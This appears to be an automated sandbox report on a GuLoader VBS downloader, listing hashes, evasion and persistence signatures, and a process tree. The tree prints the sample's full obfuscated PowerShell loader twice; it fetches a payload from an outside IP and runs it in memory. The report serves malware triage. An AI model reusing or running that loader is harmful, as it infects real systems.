Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
19-07-2023 07:25
General
-
Target
b8652df6cc90e3c90f1731725f76ea0bfc8cdbfabffbde1f80f01acd41d28165.vbs
-
Size
19KB
-
MD5
f39329106b591529cc1d7e82f4cfbfa6
-
SHA1
52570f2a11da2c8b86d7228409b474ff8c434004
-
SHA256
b8652df6cc90e3c90f1731725f76ea0bfc8cdbfabffbde1f80f01acd41d28165
-
SHA512
e9eb2ca939c99fd9ff8572c0c33f21f7d92409ba1e6874c91cd59970e2e7a04abb5870a3f1dc42a6e2f38c180dc272a7a925197008baf4df42dc3bca73708dbc
-
SSDEEP
384:51UbTY1Nzo40/XQwsLkhSA1IpoGW3RPtd3loWHWA3R0yRr:51UfUNzo4mXnSA1yoGW31dD0E
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8652df6cc90e3c90f1731725f76ea0bfc8cdbfabffbde1f80f01acd41d28165.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sawmo9 ([String]$Gaardmands){For($Myelauxefo=1; $Myelauxefo -lt $Gaardmands.Length-1; $Myelauxefo+=(1+1)){$Dryde0=$Dryde0+$Gaardmands.Substring($Myelauxefo, 1)};$Dryde0;}$Antndels=Sawmo9 'KhStmtUpR: /M/ 1R9G4O.A5S5A.B2 2 4M. 1 8B3S/Sf rAs h /VR eTmviCmIi cMrPaS.EhAh p ';$Dryde001=Sawmo9 ' i e xQ ';$Lnnesmini = Sawmo9 'P\AsRyFsWwMo w 6e4W\OWEiDn dUo wLsAPEoBw eGrRSShRe lflD\ vO1 .M0U\ psoLwTeMrIs h eElBlO.HePxde ';.($Dryde001) (Sawmo9 ' $SNAaMb o nBuFl p uU2R=B$Ue n vA:CwBiRn dGi rZ ') ;.($Dryde001) (Sawmo9 ' $ LKnAn eRs m i n i =S$AN aSb o nPuMl p ui2 +c$ LMnMnSebs m iPn iU ') ;.($Dryde001) (Sawmo9 ' $aSTaUm mDeKnPsT =E (P( g w mCiG TwDiWn 3r2 _Sp r o cHeKs s L-BFF HP r o cIeMs s IGdS= $R{rPCILDS}R) .TC otmSm aHnzdRL i noeA)E - sNp lSiPt F[ cOhSaEr ] 3R4S ');.($Dryde001) (Sawmo9 'A$BLHaJn d f sUtKeK = A$ S a m m e n sN[ $LSBa mKmOe nBsC. c oKuSnTt -S2 ] ');.($Dryde001) (Sawmo9 's$ASCp uLm eSd s 1A1D1 =G(UTSe s tP-PPiaFtAhN t$ L nRnTe sBm iVn i )A H- ASn dS C(d[CI nPt Pdt rN]S:L: ssiNzSe P-CeTqP 8D)a ') ;if ($Spumeds111) {.$Lnnesmini $Landfste;} else {;$Dryde000=Sawmo9 'FShtRaSrPtS- BGiCt sATmr aGnRsZfVeNr - S oFuRrscEed $ AVn tRnTd eBlFs H-PDRePsBt i nRaotSi oDn B$FN arbIo nCuDl pMu 2 ';.($Dryde001) (Sawmo9 't$FNUaFbAoSn uOl p uA2P= $ eAn vD:Aa p psd a tRaS ') ;.($Dryde001) (Sawmo9 ' ITm pFoBrGtG- MMo dBuhl e B i tSs T rNa nUsUfIe r ') ;$Nabonulpu2=$Nabonulpu2+'\Fasta.ski';while (-not $Feltoplys) {.($Dryde001) (Sawmo9 'F$KFBeAl t o p lEyNs = ( TAe s tR-GP aBtFhA K$ NUaSbFo n uNlCpJu 2O) ') ;.($Dryde001) $Dryde000;.($Dryde001) (Sawmo9 'SSAt aNrrt -gShl e e pn R5I ');}.($Dryde001) (Sawmo9 'F$BSKaLwEmAoP S= RG eBtF- C oBnOtIebnFts P$ NFaAbFoPn uPlopBuR2B ');.($Dryde001) (Sawmo9 'M$ BSlOuAeDb e R=B S[tSSy sPtkeGmG.CC oPn v ePrCt ]D:V: FrrUo mNBTaFs eU6 4HSItAr iSn g (e$CSTaCwAmMoS) ');.($Dryde001) (Sawmo9 'P$ D rSy dCeP0 2B =T O[ISUyAsAtDe m . T e xUt .RE n c oUdSiDnSgA]S: :FAKS C IAI .CG e t S tFrTi nGgs( $FBMlLuUe bTeb) ');.($Dryde001) (Sawmo9 ' $ c i v iUceiVsA= $HDrrEyAdDe 0N2S. sFu bTsCtSr iLn gS( 2 0U5A4V8S4G, 1 9S7S1 2F) ');.($Dryde001) $civicis;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sawmo9 ([String]$Gaardmands){For($Myelauxefo=1; $Myelauxefo -lt $Gaardmands.Length-1; $Myelauxefo+=(1+1)){$Dryde0=$Dryde0+$Gaardmands.Substring($Myelauxefo, 1)};$Dryde0;}$Antndels=Sawmo9 'KhStmtUpR: /M/ 1R9G4O.A5S5A.B2 2 4M. 1 8B3S/Sf rAs h /VR eTmviCmIi cMrPaS.EhAh p ';$Dryde001=Sawmo9 ' i e xQ ';$Lnnesmini = Sawmo9 'P\AsRyFsWwMo w 6e4W\OWEiDn dUo wLsAPEoBw eGrRSShRe lflD\ vO1 .M0U\ psoLwTeMrIs h eElBlO.HePxde ';.($Dryde001) (Sawmo9 ' $SNAaMb o nBuFl p uU2R=B$Ue n vA:CwBiRn dGi rZ ') ;.($Dryde001) (Sawmo9 ' $ LKnAn eRs m i n i =S$AN aSb o nPuMl p ui2 +c$ LMnMnSebs m iPn iU ') ;.($Dryde001) (Sawmo9 ' $aSTaUm mDeKnPsT =E (P( g w mCiG TwDiWn 3r2 _Sp r o cHeKs s L-BFF HP r o cIeMs s IGdS= $R{rPCILDS}R) .TC otmSm aHnzdRL i noeA)E - sNp lSiPt F[ cOhSaEr ] 3R4S ');.($Dryde001) (Sawmo9 'A$BLHaJn d f sUtKeK = A$ S a m m e n sN[ $LSBa mKmOe nBsC. c oKuSnTt -S2 ] ');.($Dryde001) (Sawmo9 's$ASCp uLm eSd s 1A1D1 =G(UTSe s tP-PPiaFtAhN t$ L nRnTe sBm iVn i )A H- ASn dS C(d[CI nPt Pdt rN]S:L: ssiNzSe P-CeTqP 8D)a ') ;if ($Spumeds111) {.$Lnnesmini $Landfste;} else {;$Dryde000=Sawmo9 'FShtRaSrPtS- BGiCt sATmr aGnRsZfVeNr - S oFuRrscEed $ AVn tRnTd eBlFs H-PDRePsBt i nRaotSi oDn B$FN arbIo nCuDl pMu 2 ';.($Dryde001) (Sawmo9 't$FNUaFbAoSn uOl p uA2P= $ eAn vD:Aa p psd a tRaS ') ;.($Dryde001) (Sawmo9 ' ITm pFoBrGtG- MMo dBuhl e B i tSs T rNa nUsUfIe r ') ;$Nabonulpu2=$Nabonulpu2+'\Fasta.ski';while (-not $Feltoplys) {.($Dryde001) (Sawmo9 'F$KFBeAl t o p lEyNs = ( TAe s tR-GP aBtFhA K$ NUaSbFo n uNlCpJu 2O) ') ;.($Dryde001) $Dryde000;.($Dryde001) (Sawmo9 'SSAt aNrrt -gShl e e pn R5I ');}.($Dryde001) (Sawmo9 'F$BSKaLwEmAoP S= RG eBtF- C oBnOtIebnFts P$ NFaAbFoPn uPlopBuR2B ');.($Dryde001) (Sawmo9 'M$ BSlOuAeDb e R=B S[tSSy sPtkeGmG.CC oPn v ePrCt ]D:V: FrrUo mNBTaFs eU6 4HSItAr iSn g (e$CSTaCwAmMoS) ');.($Dryde001) (Sawmo9 'P$ D rSy dCeP0 2B =T O[ISUyAsAtDe m . T e xUt .RE n c oUdSiDnSgA]S: :FAKS C IAI .CG e t S tFrTi nGgs( $FBMlLuUe bTeb) ');.($Dryde001) (Sawmo9 ' $ c i v iUceiVsA= $HDrrEyAdDe 0N2S. sFu bTsCtSr iLn gS( 2 0U5A4V8S4G, 1 9S7S1 2F) ');.($Dryde001) $civicis;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jmgr5j32.omh.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2256-157-0x00000000058A0000-0x0000000005906000-memory.dmpFilesize
408KB
-
memory/2256-179-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2256-156-0x0000000005160000-0x00000000051C6000-memory.dmpFilesize
408KB
-
memory/2256-187-0x0000000077AC1000-0x0000000077BE1000-memory.dmpFilesize
1.1MB
-
memory/2256-186-0x00000000087E0000-0x000000000A7A4000-memory.dmpFilesize
31.8MB
-
memory/2256-149-0x00000000750A0000-0x0000000075850000-memory.dmpFilesize
7.7MB
-
memory/2256-150-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2256-151-0x0000000002660000-0x0000000002696000-memory.dmpFilesize
216KB
-
memory/2256-152-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2256-153-0x0000000005200000-0x0000000005828000-memory.dmpFilesize
6.2MB
-
memory/2256-154-0x00000000050C0000-0x00000000050E2000-memory.dmpFilesize
136KB
-
memory/2256-185-0x00000000087E0000-0x000000000A7A4000-memory.dmpFilesize
31.8MB
-
memory/2256-188-0x0000000077AC1000-0x0000000077BE1000-memory.dmpFilesize
1.1MB
-
memory/2256-217-0x00000000750A0000-0x0000000075850000-memory.dmpFilesize
7.7MB
-
memory/2256-174-0x0000000007020000-0x00000000070B6000-memory.dmpFilesize
600KB
-
memory/2256-183-0x0000000007D00000-0x0000000007D01000-memory.dmpFilesize
4KB
-
memory/2256-169-0x0000000005FA0000-0x0000000005FBE000-memory.dmpFilesize
120KB
-
memory/2256-181-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2256-171-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2256-172-0x0000000007600000-0x0000000007C7A000-memory.dmpFilesize
6.5MB
-
memory/2256-173-0x0000000006520000-0x000000000653A000-memory.dmpFilesize
104KB
-
memory/2256-184-0x00000000087E0000-0x000000000A7A4000-memory.dmpFilesize
31.8MB
-
memory/2256-175-0x0000000006F80000-0x0000000006FA2000-memory.dmpFilesize
136KB
-
memory/2256-176-0x0000000008230000-0x00000000087D4000-memory.dmpFilesize
5.6MB
-
memory/2256-177-0x00000000075E0000-0x00000000075F4000-memory.dmpFilesize
80KB
-
memory/2256-178-0x00000000750A0000-0x0000000075850000-memory.dmpFilesize
7.7MB
-
memory/2256-180-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/3900-204-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-202-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-226-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-225-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-224-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-223-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-216-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-218-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-189-0x0000000000D10000-0x0000000002CD4000-memory.dmpFilesize
31.8MB
-
memory/3900-190-0x0000000000D10000-0x0000000002CD4000-memory.dmpFilesize
31.8MB
-
memory/3900-191-0x0000000077B48000-0x0000000077B49000-memory.dmpFilesize
4KB
-
memory/3900-192-0x0000000077AC1000-0x0000000077BE1000-memory.dmpFilesize
1.1MB
-
memory/3900-193-0x0000000000D10000-0x0000000002CD4000-memory.dmpFilesize
31.8MB
-
memory/3900-194-0x0000000000D10000-0x0000000002CD4000-memory.dmpFilesize
31.8MB
-
memory/3900-195-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-196-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-197-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-198-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-199-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-200-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-201-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-215-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-203-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-214-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-208-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-209-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-210-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-211-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-205-0x0000000000D10000-0x0000000002CD4000-memory.dmpFilesize
31.8MB
-
memory/3900-212-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3900-213-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/4784-145-0x00007FFF8AB90000-0x00007FFF8B651000-memory.dmpFilesize
10.8MB
-
memory/4784-170-0x00000207D4F70000-0x00000207D4F80000-memory.dmpFilesize
64KB
-
memory/4784-140-0x00000207BC8E0000-0x00000207BC902000-memory.dmpFilesize
136KB
-
memory/4784-146-0x00000207D4F70000-0x00000207D4F80000-memory.dmpFilesize
64KB
-
memory/4784-147-0x00000207D4F70000-0x00000207D4F80000-memory.dmpFilesize
64KB
-
memory/4784-221-0x00007FFF8AB90000-0x00007FFF8B651000-memory.dmpFilesize
10.8MB
-
memory/4784-148-0x00000207D4F70000-0x00000207D4F80000-memory.dmpFilesize
64KB
-
memory/4784-155-0x00007FFF8AB90000-0x00007FFF8B651000-memory.dmpFilesize
10.8MB
-
memory/4784-167-0x00000207D4F70000-0x00000207D4F80000-memory.dmpFilesize
64KB
-
memory/4784-168-0x00000207D4F70000-0x00000207D4F80000-memory.dmpFilesize
64KB